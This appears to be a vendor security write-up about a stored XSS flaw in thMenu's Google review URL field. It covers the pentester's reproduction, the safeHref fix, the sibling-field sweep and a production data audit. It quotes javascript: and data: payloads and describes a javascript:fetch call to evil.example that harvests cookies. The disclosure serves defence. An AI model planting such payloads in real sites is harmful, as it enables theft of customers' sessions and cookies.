No safeHref on the Google review URL field: javascript: scheme stored XSS in review_url (PR #548 PP C1)
Seyma, a 36-year-old independent web pentester from Eyyubiye, Sanliurfa, with seven years in the field (four years of AppSec at Garanti BBVA, then three years solo against Turkish fintech and restaurant SaaS), ran a coverage-parity audit of the URL fields in the open-source thMenu repo in Q1 2026, using PR #334 as the reference. PR #334 had shipped safeHref on restaurants.{wifi_url,logo_url,cover_url} and social_links.url. A grep for newer URL fields turned up google_reviews_config.review_url, the target of the Pro-tier widget's "Leave us a Google review" button; the PR #334 safeHref sweep had not covered that table.

Lab repro: in the admin panel of a thMenu Pro test account she set the Google Reviews review_url to javascript:alert('xss') and clicked Save. 200 OK, no scheme validation at all. She then opened the test restaurant's menu URL and clicked the "Rate us on Google" button: the alert popped. The javascript: URL is parsed as a link and the script executes on the restaurant menu origin. That is stored XSS against customers: cookies, session and geolocation are attacker-controllable, and since the CSP on menu.thmenu.com carried unsafe-inline before PR #347, execution was permitted. An attacker with admin-panel access could set review_url to javascript:fetch(...) against evil.example and harvest cookies. data:text/html<script>alert(1)</script> was accepted too; the data: scheme is outside the safeHref allowlist and should have been rejected.

Seyma's writeup to security@thmenu.com: the google_reviews_config.review_url PUT has no safeHref and accepts javascript:, data: and file:; CVSS 8.4 HIGH; operator-side stored XSS with customer-side cookie and session theft and a cross-restaurant pivot; a sibling-coverage gap that the PR #334 sweep had not closed. Threat model: (a) a compromised admin plants a javascript: payload for customer-side XSS; (b) a malicious sub-operator on a Pro tier with staff menu-edit access uses the same vector; (c) social engineering, where a spoofed Google support message tells the operator to paste a javascript:fetch "review URL boost".
Engineering reproduced it in 30 minutes and went through three wrong theories first. (1) DOMPurify at render time: review_url is a URL field, not HTML, and DOMPurify in an HTML context does no URL-scheme validation, so javascript:alert passes straight through. (2) Tighten the CSP: the customer menu on menu.thmenu.com needs unsafe-inline for its inline styles and scripts, and with unsafe-inline in place a javascript: href is not stopped by CSP; the click executes directly. (3) A frontend regex filter: client-side validation is bypassed with a direct PUT from curl or Postman, so server-side validation is mandatory. The correct pattern is the safeHref helper: an http(s) + mailto + tel scheme allowlist with a 500-character max length, the same helper PR #334 introduced, applied to the google_reviews_config PUT route.

Forensics: in apps/web-admin/src/app/api/google-reviews-config/route.ts the PUT handler writes review_url to the DB raw, and the menu page renders <a href={config.review_url}>{button_label}</a>, injecting the value into the href attribute with no scheme validation. apps/web-admin/src/lib/sanitize.ts:safeHref, from PR #334, allows the http(s), mailto and tel schemes and rejects javascript:, data:, file:, blob: and vbscript:. PR #334 shipped it on the restaurants and social_links PUTs; google_reviews_config was forgotten. brands.logo_url in PR #661 (batch XI F3) was the same kind of sweep omission, the sibling-surface coverage gap pattern described in blog #1136.

The fix, PR #548 batch PP C1. Layer 1: safeHref validation on the google_reviews_config PUT, safeHref(review_url, maxLen 500), returning 422 invalid_review_url. Layer 2: a sibling-surface sweep of URL fields across the monorepo by grep: restaurants + social_links (PR #334), google_reviews_config (PP C1), brands.logo_url (XI F3), affiliate_postback_url (PR #609 CCC-B), custom_domains.cname_target (internal), and menu.cover_image_url + products.image_url (R2 prefix regex). Layer 3: a CI grep guard in .github/workflows/ci.yml that runs grep -rn for the pattern href={.*\.url and emits a "Did you use safeHref?" warning. Production audit: a DB scan, SELECT review_url where the value is NOT LIKE http(s), found 3 restaurants with malformed values, all operator self-tests (a bookmarklet and a Google Maps deep link), no real attacker. The 3 affected operators got a personal email and manual cleanup: review_url set to null, for the operator to paste the link again.
A 90-day audit of Cloudflare access logs and Sentry breadcrumbs showed 0 third-party attacker reproductions: an operator-curiosity set, not yet exploited. Seyma received €1800 via Wise for the CVSS 8.4 finding, plus a Hall of Fame entry and an advisory-board seat; her blog (2.2k readers) in the Sanliurfa AppSec community makes the case a benchmark for Turkish SaaS security disclosure. Cameron, 38, from Stockbridge, Edinburgh, nine years in the field and ex-NCC Group, filed a parallel disclosure and received €2000 (LinkedIn, 5.1k).

The pattern: an operator-controlled URL field that is writable via PUT and rendered customer-side ALWAYS goes through safeHref, with the http(s) + mailto + tel allowlist, the 500-character max and explicit rejection of javascript:/data:/file:/blob:/vbscript:. The canonical sibling sweep: (a) apply the safeHref helper; (b) DB schema TEXT NOT NULL DEFAULT or nullable; (c) PUT validation with 422; (d) a render-side defensive double-check; (e) the CI grep guard pattern. Implementation: a safeHref sweep checkbox in PR review for every URL-field migration, safeHref on every PUT, defensive validation on the frontend form, a render-side fallback, a production audit that scans existing data with manual cleanup, the CI grep guard, and a PR-template checkbox. Reference: PR #548.
thMenu Team
thmenu.com